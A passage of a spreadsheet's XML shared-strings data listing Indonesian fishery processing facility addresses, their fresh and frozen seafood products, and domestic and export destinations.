    <t>Jl. Kima VI Kav F1/B1, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Australia, China, Korea, Republic of, Taiwan, Province of China, Thailand, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerisi, Lencam, Kerapu, Layur, Kakap, Ekor Kuning, Barramundi)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerisi, Lencam, Kerapu, Layur, Kakap, Ekor Kuning, Barramundi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Bonito, Tongkol, Kuwe, Layaran, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Australia, China</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Bonito, Tongkol, Kuwe, Layaran, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Gurita Rebus Beku</t>
  </si>
  <si>
    <t>Jl. Diponegoro Gang Ulam Kencana No.48B Pesanggaran, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Jl. Kima 14 Kav SS 12, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap Putih, Bream, Kerisi, Katamba, Lencam, Kuniran, Kerapu, Kakatua, Kakap Merah, Kaci-kaci)</t>
  </si>
  <si>
    <t>Australia, France, Netherlands, United States</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Barakuda, Gabus Laut, Terbang, Kuwe, Julung-julung, Lemadang, Marlin, Meka, Gindara, Selar, Layang, Tenggiri)</t>
  </si>
  <si>
    <t>Australia, France, Italy, Japan, United States</t>
  </si>
  <si>
    <t>Australia, Italy, Mauritius, United States</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kakap Putih, Bream, Kerisi, Katamba, Lencam, Kuniran, Kerapu, Kakatua, Kakap Merah, Kaci-kaci)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Lemuru, Barakuda, Gabus Laut, Terbang, Kuwe, Julung-julung, Lemadang, Marlin, Meka, Gindara, Selar, Layang, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. Raya Semarang-Tuban, Kel. Sendangmulyo, Kec. Sluke, Kabupaten Rembang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>China, Malaysia, Singapore</t>
  </si>
  <si>
    <t>China, Singapore, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Mata Besar, Gulama, Kerapu, Bawal, Kakap)</t>
  </si>
  <si>
    <t>Hong Kong, Malaysia, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Komplek Pergudangan Mutiara Kosambi 1 Blok A-5 No.11, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Cacing Laut Kering</t>
  </si>
  <si>
    <t>Hong Kong, Malaysia, Singapore</t>
  </si>
  <si>
    <t>Komplek Industri dan Pergudangan Sinar Buduran II Blok A No.40, Kel. Prasung, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Tongkol, Deho, Semar, Banjar, Layang, Cakalang, Tetengkek)</t>
  </si>
  <si>
    <t>Kabupaten Trenggalek, Kabupaten Tulungagung, Kabupaten Lumajang, Kabupaten Banyuwangi, Kabupaten Pasuruan, Kabupaten Lamongan, Kabupaten Bangkalan, Kabupaten Sampang, Kabupaten Pamekasan, Kabupaten Sumenep, Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Kebun Raya No.2, Kel. Rejowinangun, Kec. Kotagede, Kota Yogyakarta&lt;br&gt;Daerah Istimewa Yogyakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Swanggi, Bawal, Gulama, Pisang-pisang, Kerapu, Layur, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>China, Hong Kong, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Ruko Lodan Center, Jl. Lodan Raya No.2 Blok F No.2-7, Kel. Ancol, Kec. Pademangan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Mexico, Netherlands, United States, Viet Nam</t>
  </si>
  <si>
    <t>Egypt</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Cobia, Kembung, Lemadang, Marlin, Gindara, Layaran, Cakalang, Tenggiri, Pedang)</t>
  </si>
  <si>
    <t>Germany, Netherlands, Russian Federation, United States</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kuwe, Anggoli, Janahan, Kerapu, Layur, Sukang, Kakatua, Kakap, Kurisi, Ekor Kuning, Barramundi)</t>
  </si>
  <si>
    <t>India, Netherlands, United States</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Cobia, Kembung, Lemadang, Marlin, Gindara, Layaran, Cakalang, Tenggiri, Pedang)</t>
  </si>
  <si>
    <t>France, Germany, Netherlands, United States</t>
  </si>
  <si>
    <t>Netherlands, United States</t>
  </si>
  <si>
    <t>India, United States</t>
  </si>
  <si>
    <t>Desa Dongkala, Kec. Pasarwajo, Kabupaten Buton&lt;br&gt;Sulawesi Tenggara</t>
  </si>
  <si>
    <t>Kawasan Pelabuhan Perikanan Muara Angke, Jl. Pendaratan Ikan No.3 Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku (Stik Kepiting Analog, Kue Ikan Kibun Narutomaki)</t>
  </si>
  <si>
    <t>Jl. Siliwangi Pelabuhan Perikanan Nusantara, Kel. Palabuhanratu, Kec. Palabuhanratu, Kabupaten Sukabumi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Wakame Beku</t>
  </si>
  <si>
    <t>Jl. Pala Barat II Blok L No.13, Kel. Mejasem Barat, Kec. Kramat, Kabupaten Tegal&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Kabupaten Brebes, Kota Tegal</t>
  </si>
  <si>
    <t>Pari Berbumbu Kering</t>
  </si>
  <si>
    <t>Tulang Pari Kering</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Layur, Bawal, Kakap)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Pisang-pisang, Cakalang)</t>
  </si>
  <si>
    <t>Ikan Hasil Budidaya Beku (Nila, Bandeng, Lele)</t>
  </si>
  <si>
    <t>Jl.Jamaker, RT.26, Kelurahan Nunukan Barat, Kec,Nunukan, Kab.Nunukan&lt;br&gt;Kalimantan Utara</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Cumi-cumi)</t>
  </si>
  <si>
    <t>Kabupaten Malinau, Kabupaten Bulungan, Kabupaten Tana Tidung, Kabupaten Nunukan, Kota Tarakan</t>
  </si>
  <si>
    <t>Ikan Pelagis Utuh Beku (Tongkol, Kembung, Layang)</t>
  </si>
  <si>
    <t>Jl. Pelabuhan No. 35, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kabupaten Banyuwangi</t>
  </si>
  <si>
    <t>Jl. Sampangan No.18, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kabupaten Banyuwangi, Kota Surabaya</t>
  </si>
  <si>
    <t>Cambodia</t>
  </si>
  <si>
    <t>Jl. Tambak Aji V No.9, Kel. Tambak Aji, Kec. Ngaliyan, Kota Semarang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Fillet Nila Segar</t>
  </si>
  <si>
    <t>Fillet Nila Beku</t>
  </si>
  <si>
    <t>Kota Jakarta Barat, Kota Bogor, Kota Bandung, Kota Surabaya</t>
  </si>
  <si>
    <t>Australia, Canada, Netherlands, Thailand, United States</t>
  </si>
  <si>
    <t>Nila Loin Beku</t>
  </si>
  <si>
    <t>Nila Utuh Beku</t>
  </si>
  <si>
    <t>Kulit Nila Beku</t>
  </si>
  <si>
    <t>France, Germany</t>
  </si>
  <si>
    <t>Kompleks Pergudangan Tunas Bitung Blok C-3 No.09-11, Kel. Pasir Jaya, Kec. Cikupa, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Kp. Cisemplak RT 003 RW 006, Kel. Wangunreja, Kec. Nyalindung, Kabupaten Sukabumi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku (Kaki Naga, Siomay Ikan, Ekado, Minikado, Tekado)</t>
  </si>
  <si>
    <t>Kabupaten Sukabumi, Kota Bogor, Kota Sukabumi, Kota Bandung</t>
  </si>
  <si>
    <t>Kawasan Industri Millenium Jl. Millenium 11 Blok F4 No. 3 (Room 3), Kel. Peusar, Kec. Panongan, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Kota Bandung</t>
  </si>
  <si>
    <t>Mussel Segar, Scallop Segar, Tiram Segar, Clams Segar</t>
  </si>
  <si>
    <t>Mussel Beku, Scallop Beku, Tiram Beku, Clams Beku</t>
  </si>
  <si>
    <t>Kampus UMMU Ternate, Jl. KH. A. Dahlan No.100, Kel. Sasa, Kec. Ternate Selatan, Kota Ternate&lt;br&gt;Maluku Utara</t>
  </si>
  <si>
    <t>Kota Ternate</t>
  </si>
  <si>
    <t>Jl. Raya Gunung Gangsir RT 007 RW 009, Kel. Nogosari, Kec. Pandaan, Kabupaten Pasuruan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>American Samoa, Australia, Canada, Egypt, Libya, Papua New Guinea, Qatar, Saudi Arabia, United States, Uzbekistan</t>
  </si>
  <si>
    <t>Dusun Punden RT 3 RW 2, Kel. Jeblog, Kec. Talun, Kabupaten Blitar&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kota Yogyakarta, Kabupaten Tulungagung, Kabupaten Blitar, Kabupaten Kediri, Kabupaten Malang, Kabupaten Gresik, Kota Kediri, Kota Blitar, Kota Malang, Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Worang By Pass, Desa Kaima, Kec. Kauditan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Jl. Marunda Makmur No.368 Kavling Baru Dusun I No.95 RT 002 RW 022, Kel. Segara Makmur, Kec. Tarumajaya, Kabupaten Bekasi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Amberjack, Makerel, Kod, Hamachi, Salem, Seabream, Seabass)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Flounder, Halibut, Striped Jack)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Flounder, Halibut, Striped Jack)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Amberjack, Makerel, Kod, Hamachi, Salem, Seabream, Seabass)</t>
  </si>
  <si>
    <t>China, United States</t>
  </si>
  <si>
    <t>Jl. Mutiara Margomulyo Indah Blok K No.21, Kel. Manukan Wetan, Kec. Tandes, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Jl. Kapten Piere Tendean, Kel. Galala, Kec. Sirimau, Kota Ambon&lt;br&gt;Maluku</t>
  </si>
  <si>
    <t>Japan, Korea, Democratic People's Republic of, Sri Lanka</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap Putih, Gulama, Kerapu, Marlin, Kakatua, Kakap Merah, Layaran)</t>
  </si>
  <si>
    <t>Jl. Baru RT 04, Kel. Kurau Barat, Kec. Koba, Kabupaten Bangka Tengah&lt;br&gt;Kepulauan Bangka Belitung</t>
  </si>
  <si>
    <t>Stik Ikan, Stik Udang</t>
  </si>
  <si>
    <t>Wilayah Jaga IX, Desa Maumbi, Kec. Kalawat, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Ikan Demersal Hidup</t>
  </si>
  <si>
    <t>Jl. Kawasan Wisata Tanjung Bayang RT 04 RW 05, Kel. Tanjung Medeka, Kec. Tamalate, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Katamba, Manyung, Kerapu, Layur, Bawal, Kakap, Barramundi)</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Kuwe, Tenggiri)</t>
  </si>
  <si>
    <t>China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Pelantar I No.59 H RT 003 RW 008, Kel. Tanjung Pinang Kota, Kec. Tanjung Pinang Kota, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerapu, Bawal, Kakap, Kaci-kaci, Timun, Barramundi)</t>
  </si>
  <si>
    <t>Bonaire, Sint Eustatius and Saba</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Tamban, Benggol, Tenggiri, Selar Kuning)</t>
  </si>
  <si>
    <t>Komplek PPN Tanjungpandan, Jl. RE Martadinata, Kel. Kota, Kec. Tanjungpandan, Kabupaten Belitung&lt;br&gt;Kepulauan Bangka Belitung</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Selayar, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerapu, Kakap, Kaci-kaci, Ekor Kuning)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Baby Tuna, Tongkol, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Jl. Malaka, Kel. Batu Nampar Selatan, Kec. Jerowaru, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat</t>
  </si>
  <si>
    <t>Kabupaten Gianyar</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kabupaten Gianyar</t>
  </si>
  <si>
    <t>China, Hong Kong, Singapore, Viet Nam</t>
  </si>
  <si>
    <t>Kota Jakarta Barat, Kabupaten Gianyar</t>
  </si>
  <si>
    <t>Kawasan PPN Prigi, Kel. Tasikmadu, Kec. Watulimo, Kabupaten Trenggalek&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Deho, Kembung, Semar, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Trenggalek, Kabupaten Tulungagung, Kota Surabaya</t>
  </si>
  <si>
    <t>Kawasan Pelabuhan PPS Nizam Zachman Blok K 7D, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Barakuda, Bonito, Escolar, Kembung, Lemadang, Layaran, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Lencam, Senangin, Biji Nangka, Kerapu, Layur, Halibut, Kakatua, Kakap, Kaci-kaci, Kuro)</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Executive Industrial Park Blok A3 No.11, Kel. Belian, Kec. Batam Kota, Kota Batam&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap Putih, Anggoli, Kerapu, Kakap Merah, Ekor Kuning)</t>
  </si>
  <si>
    <t>China, Japan, Singapore, United States</t>
  </si>
  <si>
    <t>Jl. Raya Cirebon - Tegal Km 8,2 Blok Kemis, Kel. Kanci Kulon, Kec. Astanajapura, Kabupaten Cirebon&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Jl. Husein Sastranegara Komplek Pergudangan Nusa Indah Room CS-4A Blok B/37 RT 004 RW 003, Kel. Jurumundi, Kec. Benda, Kota Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Kembung, Makerel, Salem, Sarden)</t>
  </si>
  <si>
    <t>Kota Jambi, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Tangerang, Kota Pontianak</t>
  </si>
  <si>
    <t>Thailand</t>
  </si>
  <si>
    <t>China, Taiwan, Province of China, Thailand</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerapu, Kakatua, Bawal, Kakap)</t>
  </si>
  <si>
    <t>Jl. Tomangambari, Kel. Songka, Kec. Wara Selatan, Kota Palopo&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Jl. Yos Sudarso No.72, Kel. Klatak, Kec. Kalipuro, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Jl. Batangase No.50, Kel. Batangase, Kec. Bontoa, Kabupaten Maros&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Australia, China, Hong Kong, Malaysia, Saudi Arabia, Singapore, Taiwan, Province of China, Thailand, United Arab Emirates</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Katamba, Sebelah, Kerapu, Layur, Kakatua, Bawal, Kakap, Barramundi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Kembung, Layang, Tenggiri)</t>
  </si>
  <si>
    <t>Saudi Arabia, Singapore, United Arab Emirates</t>
  </si>
  <si>
    <t>China, Saudi Arabia, United Arab Emirates</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Amberjack, Makerel, Pacific Saury, Salmon, Sea Robin, Jack Fish, Mackerel Scad, Goosefish)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Barakuda, Kembung, Lemadang, Talang-talang, Layang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Lencam, Biji Nangka, Kerapu, Layur, Kurisi, Cunang)</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Viet Nam</t>
  </si>
  <si>
    <t>Cephalopoda Beku (Cumi-cumi, Gurita)</t>
  </si>
  <si>
    <t>Jl. Pesisir Timur RT 01 RW 01, Kel. Klatakan, Kec. Kendit, Kabupaten Situbondo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Jl. Lingkar Utara Mangunharjo, Kel. Mangunharjo, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Fillet Ikan Demersal Beku (Kakap Putih, Mata Besar, Swanggi, Bawal Hitam, Kerisi, Gulama, Lencam, Sebelah, Senangin, Anggoli, Kerapu, Layur, Jenaha, Sukang)</t>
  </si>
  <si>
    <t>China, Malaysia, Taiwan, Province of China, United States</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Demak, Kabupaten Banyuwangi, Kota Malang, Kota Probolinggo</t>
  </si>
  <si>
    <t>Australia, China, Malaysia, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Kota Jakarta Barat, Kabupaten Rembang, Kabupaten Demak, Kota Surabaya</t>
  </si>
  <si>
    <t>China, Malaysia, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Ikan Air Tawar Beku (Lele, Belut, Gurami, Bandeng, Patin, Bawal, Nila)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Demak, Kabupaten Banyuwangi, Kota Surabaya</t>
  </si>
  <si>
    <t>Kawasan Industri Karyadeka Pancamurni Kav. B3, Kel. Pasirsari, Kec. Cikarang Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Kota Bekasi, Kota Tangerang, Kota Serang</t>
  </si>
  <si>
    <t>Japan, Malaysia, Thailand</t>
  </si>
  <si>
    <t>Jl Poh Gading No.100X Taman Jimbaran, Kel. Jimbaran, Kec. Kuta Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Pergudangan Cikupa Mas Jl. Mitramas Raya No.2C RT 009 RW 004, Kel. Talagasari, Kec. Cikupa, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Australia, China, New Zealand</t>
  </si>
  <si>
    <t>Gedung Olahan Sentra Minapolitan, Jl. H. Usa No.12A, Kel. Ciseeng, Kec. Ciseeng, Kabupaten Bogor&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kabupaten Bogor, Kabupaten Karawang, Kota Bogor, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Pindang Tongkol Suir</t>
  </si>
  <si>
    <t>Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kabupaten Bogor, Kabupaten Bandung, Kota Bogor, Kota Depok, Kota Tangerang, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kabupaten Bogor, Kota Bogor, Kota Depok</t>
  </si>
  <si>
    <t>Desa Molowahu, Kec. Tibawa, Kabupaten Gorontalo&lt;br&gt;Gorontalo</t>
  </si>
  <si>
    <t>China, Japan, Korea, Democratic People's Republic of</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Kerapu, Kakatua, Kakap)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Teri, Tongkol, Kembung, Tenggiri, Layang, Nike)</t>
  </si>
  <si>
    <t>Ikan Air Tawar Beku (Lele, Patin, Nila)</t>
  </si>
  <si>
    <t>Jl. Dumais Lingkungan II, Kel. Girian Bawah, Kec. Girian, Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Layang)</t>
  </si>
  <si>
    <t>Jl. Raya Narogong Km 26.5 Kawasan Industri Kembang Kuning, Kel. Kembang Kuning, Kec. Klapanunggal, Kabupaten Bogor&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t xml:space="preserve">Udang Bernilai Tambah Beku (Udang Pop Corn, Eby Fry, Udang Butterfly) </t>
  </si>
  <si>
    <t>Kepiting Bernilai Tambah Beku (Kue Kepiting)</t>
  </si>
  <si>
    <t>Australia, Lebanon, United States</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakatua, Kakap, Lodem)</t>
  </si>
  <si>
    <t>Kawasan Industri dan Pergudangan Marunda Center Blok Q2 No.23A, Jl. Marunda Makmur, Kel. Segaramakmur, Kec. Tarumanegara, Kabupaten Bekasi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Utara, Kabupaten Bogor</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Alaska Pollock, Salem)</t>
  </si>
  <si>
    <t>Jl. Bakti No.976, Kel. Panipahan Darat, Kec. Pasir Limau Kapas, Kabupaten Rokan Hilir&lt;br&gt;Riau</t>
  </si>
  <si>
    <t>Gurita Segar</t>
  </si>
  <si>
    <t>Cumi-Cumi Segar</t>
  </si>
  <si>
    <t>Jl. Pelabuhan Perikanan Samudera Belawan No.42, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>China, Singapore, Thailand</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Kembung, Selayang, Selar, Cakalang, Tenggiri, Selar Kuning)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Malong, Gulama, Biji Nangka, Kerapu, Layur, Sukang, Beloso, Bawal, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>Tuna Utuh Segar</t>
  </si>
  <si>
    <t>Dusun Air Manis, Kel. Laha, Kec. Teluk Ambon, Kota Ambon&lt;br&gt;Maluku</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Deho, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Surabaya, Kota Ambon</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung No 1,2,11,12 RT 020 RW 017, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>IDS DSC MED Center Jln. Jawa Blok A1 MM2100 Industrial Estate Cibitung, Desa Mekarwangi, Kec. Cikarang Barat, Kabupaten Bekasi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Kabupaten Bekasi, Kota Bogor, Kota Surabaya, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kabupaten Bekasi, Kota Bogor, Kabupaten Pati, Kota Surabaya, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Tepung Alginat</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kabupaten Bekasi, Kota Bogor, Kota Surabaya</t>
  </si>
  <si>
    <t>Flakes Rumput Laut, Tepung Rumput Laut</t>
  </si>
  <si>
    <t>Jl. Pahlawan No.102, Kel. Nunbaun Sabu, Kec. Alak, Kota Kupang&lt;br&gt;Nusa Tenggara Timur</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Tembang, Layang, Cakalang, Tenggiri, Lemadang, Marlin)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Lencam, Maubara, Anggoli, Kerapu, Layur, Kakatua, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>Ikan Hasil Budidaya Beku (Lele, Gurame, Mas, Patin, Bandeng, Nila)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bekasi, Kota Tangerang</t>
  </si>
  <si>
    <t>Chile, Philippines, Singapore, Taiwan, Province of China, United States</t>
  </si>
  <si>
    <t>JL. Margomulyo No. 44/OO-1 Surabaya, Kel. Asem Rowo, Kec. Asem Rowo, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Jl. Rembang Industri VII/3 Pier Pasuruan, Kel. Pejangkungan, Kec. Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Layur, Kembung, Cakalang, Tenggiri, Tonang)</t>
  </si>
  <si>
    <t>China, Thailand</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Swanggi, Senangin, Kakap Merah, Kakap, Kuro, Kurisi)</t>
  </si>
  <si>
    <t>China, Malaysia, Thailand</t>
  </si>
  <si>
    <t>Japan, Sri Lanka, Taiwan, Province of China, United States</t>
  </si>
  <si>
    <t>Cephalopoda Segar (Sotong, Cumi Karet, Gurita, Semampar, Cumi-cumi)</t>
  </si>
  <si>
    <t>Komplek Pelabuhan Perikanan Nusantara Brondong, Kawasan PPDI RT 01 RW 05 Jompong, Kel. Brondong, Kec. Brondong, Kabupaten Lamongan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Rembang, Kabupaten Lamongan, Kota Surabaya</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Malaysia, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Swangi, Gulama, Sebelah, Senangin, Biji Nangka, Kuniran, Layur, Kakap, Kuro, Kurisi, Barramundi, Kerapu)</t>
  </si>
  <si>
    <t>Kabupaten Rembang, Kabupaten Tuban, Kabupaten Lamongan</t>
  </si>
  <si>
    <t>China, Egypt, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Deho, Kembung, Muroaji, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Kabupaten Trenggalek, Kabupaten Pasuruan, Kabupaten Tuban, Kabupaten Lamongan, Kabupaten Gresik, Kabupaten Bangkalan, Kabupaten Sumenep</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Korea, Democratic People's Republic of, Saudi Arabia, Viet Nam</t>
  </si>
  <si>
    <t>Kabupaten Banyuwangi, Kabupaten Situbondo</t>
  </si>
  <si>
    <t>Kabupaten Banyuwangi, Kabupaten Pasuruan, Kota Surabaya</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Lemadang, Layang)</t>
  </si>
  <si>
    <t>Canada, Netherlands, Philippines, Spain, United States</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemadang, Layang)</t>
  </si>
  <si>
    <t>Jl. Madidir Ure Lingkungan III, Kel. Madidir Ure, Kec. Madidir, Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Seafood Bernilai Tambah Beku</t>
  </si>
  <si>
